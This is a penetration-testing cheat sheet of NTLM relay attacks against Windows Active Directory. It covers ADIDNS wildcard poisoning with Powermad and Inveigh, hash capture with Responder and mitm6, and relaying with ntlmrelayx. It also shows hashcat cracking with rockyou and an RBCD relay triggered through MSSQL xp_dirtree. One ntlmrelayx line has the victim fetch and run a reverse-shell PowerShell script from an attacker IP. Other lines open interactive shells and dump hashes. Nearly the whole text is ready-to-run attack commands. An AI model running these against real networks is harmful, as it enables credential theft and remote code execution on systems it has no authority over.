Relay Attacks

Hash	Hashcat	Attack method
LM	3000	crack/pass the hash
NTLM/NTHash	1000	crack/pass the hash
NTLMv1/Net-NTLMv1	5500	crack/relay attack
NTLMv2/Net-NTLMv2	5600	crack/relay attack

Abusing ADIDNS to Send traffic to the target 

#Send DNS traffic to the attacker machine, so that we can relay the traffic and gain access to target machines/hashes
Import-Module ./Powermad.ps1
PowerShell New-ADIDNSNode -Node * -Data 'ATTACKER_IP' -Verbose

#assign permissions to the ADIDNS
Powershell Grant-ADIDNSPermission -Node * -Principal "Authenticated Users" -Access GenericAll -Verbose

Capturing Hashes using responder and cracking hashes 

#Find the interface of the IP (see via route table)
ip route get 10.10.10.10

#start responder
sudo proxychains responder -I tun0 -v 

#Start responder with WPAD Enabled and try to download NTLM hashes if any found
python3 Responder.py  -I ens160 -wFb -v --lm --disable-ess

#Crack the hashes using hashcat
hashcat -m 5600 -a 0 hash rockyou.txt -r /usr/share/hashcat/rules/InsidePro-PasswordsPro.rule --force 

Mitm6 & NTLMRelayx

#start MITM6 and assign IPV6 DNS Address to hosts
mitm6 -d victim.domain

#start ntmrelay
ntlmrelayx.py -wh Attacker_IP -t smb://VICTIM_IP/ -i 

NTLM relay of ADWS (WCF) connections

This attack works only when a connection is initiated from the target machine. 

#Start 
ntlmrelayx.py --no-smb-server --no-http-server -t rpc://TARGET_IP-c "echo a > c:\test"

#Simulate the vuln
get-aduser -filter * -server <pentester_machine>

#Capture and view the traffic in wireshark
socat TCP-LISTEN:9389,fork,reuseaddr TCP:DC_IP:9389

Relaying using ntlmrelayx
# -wh: Server hosting WPAD file (Attacker’s IP)
# -t: Target (You cannot relay credentials to the same device that you’re spoofing)
# -i: open an interactive shell
# -l: store the collected info in a specified directory 
# -c: execute the command 
# -e: execute a binary

ntlmrelayx can automatically dump hashes, when it can access an administrator account. 
so, lookout for the hashes in the output. Also Impacket 0.9.23-dev version has issues with ntlmrelay. better use the stable version.
sudo proxychains ntlmrelayx.py -t smb://192.168.1.2 -smb2support

Useful commands
sudo proxychains ntlmrelayx.py -t smb://192.168.1.2 -smb2support

sudo proxychains ntlmrelayx.py -t  smb://10.10.10.10 -l loot -i  -smb2support -c  "powershell.exe -c iex(new-object system.net.webclient).downloadstring('http://10.10.10.102:8000/powerrev.ps1')" 

#Target a specific user on a specific target
sudo proxychains ntlmrelayx.py -t smb://USERNAME@192.168.2.1 -smb2support 

Inveigh 
Inveigh does not support SMB-auth, so prefer ntlmrelayx

Import-Module .\Inveigh.ps1

#Start ADIDNS abuse
Invoke-Inveigh -ConsoleOutput Y -adidns combo  

#Use credentials for ADIDNS Abuse using Inveigh
$SecPassword = ConvertTo-SecureString 'P#SSW)RD!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('steins.LOCAL\USERNAME', $SecPassword)

Invoke-Inveigh -ConsoleOutput Y -adidns combo  -ADIDNSCredential $Cred -ADIDNSDomain  192.168.2.10 

Invoke-Inveigh -ConsoleOutput Y -adidns combo -ADIDNSDomain steins.local -ADIDNSDomainController 192.168.2.10


#Capturing Hashes on the target 
Invoke-Inveigh -ConsoleOutput Y -DNS Y 

#cracking the hashes captured from inveigh
hashcat -m 5600 hash ~/Downloads/Tools/rockyou.txt --force -r  /usr/share/hashcat/rules/d3ad0ne.rule


#if you are unable to crack a hash, use inveigh-relay to relay the hashes
invoke-inveighrelay -ConsoleOutput Y -Target 192.168.21.155 -ShowHelp N -StatusOutput N -Command  "powershell.exe -c whoami"

Resource based Constraint Delegation Attack on MSSQL Server

More Info Here

#add a DNS entry to attacker machine    
Invoke-DNSUpdate -DNSType A -DNSName shit -DNSData 10.10.10.10

#run the command on sql server which has xp_dirtree stored procedure
SQLCMD -S SERVER\username -Q "exec master.dbo.xp_dirtree '\\shit\a'" -U Admin -P password

proxychains python rbcd_relay.py SQLServer_IP steins.local server$ Other_User